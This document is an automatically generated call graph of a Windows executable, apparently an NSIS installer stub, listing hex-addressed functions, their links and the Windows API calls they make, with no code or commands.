4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3654 405db4 3652->3654 3653->3654 3656 405daf CharNextW 3653->3656 3655 405dd8 3654->3655 3657 405d32 CharNextW 3654->3657 3655->3622 3656->3655 3657->3654 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 